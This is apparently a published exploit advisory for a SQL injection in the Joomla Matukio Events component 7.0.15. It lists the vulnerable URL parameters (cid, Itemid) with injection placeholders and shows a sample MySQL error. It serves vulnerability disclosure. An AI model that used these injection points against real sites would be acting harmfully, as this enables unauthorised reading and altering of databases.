#################################################################### # Exploit Title : Joomla Matukio Events Components 7.0.15 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 25/02/2019 # Vendor Homepage : compojoom.com # Software Download Link : matukio.compojoom.com # Software Information Link : extensions.joomla.org/extension/matukio-events/ compojoom.com/joomla-extensions/matukio-events-management-made-easy # Software Version : 7.0.15 and previous versions # Software Price : Paid Download # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** Matukio Events - The all in one events and webinar solution for Joomla. From event management and presentation, over flexible booking forms, till payment processing! #################################################################### # Impact : *********** Joomla Matukio Events Components 7.0.15 [ and other versions ] component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?tmpl=component&option=com_matukio&view=ics&format=raw /index.php/en/?option=com_matukio&view=ics&format=raw /index.php?option=com_matukio&view=participantlist&cid=[SQL Injection] /index.php?option=com_matukio&view=calendar&Itemid=[SQL Injection] /index.php?option=com_matukio&view=participantlist&cid=[ID-NUMBER]&Itemid=[SQL Injection] #################################################################### # Example SQL Database Error : **************************** #1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cur.id as curid, cur.title as curtitle, cur.sign as currencySign, cur.posi' at line 2 SQL=SELECT a.*, r.*, cat.title AS category cur.id as curid, cur.title as curtitle, cur.sign as currencySign, cur.position as currencyPosition, cur.decimalsign as decimalSign, cur.payment_ code as payment_code, IF(r.override_title IS NULL or r.override_title = '', a.title, r.override_title) as title, IF(r.override_maxpupil IS NULL or r.override_maxpupil = '', a.maxpupil, r.override_maxpupil) as maxpupil FROM #__matukio_recurring AS r LEFT JOIN #__matukio AS a ON r.event_id = a.id LEFT JOIN #__categories AS cat ON cat.id = a.catid LEFT JOIN #__matukio_currencies AS cur ON cur.id = a.currency_id WHERE r.published = '1' AND r.end > '' AND r.booked > '' AND cat.access IN (1,1) ORDER BY r.begin DESC LIMIT 0, 1000 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################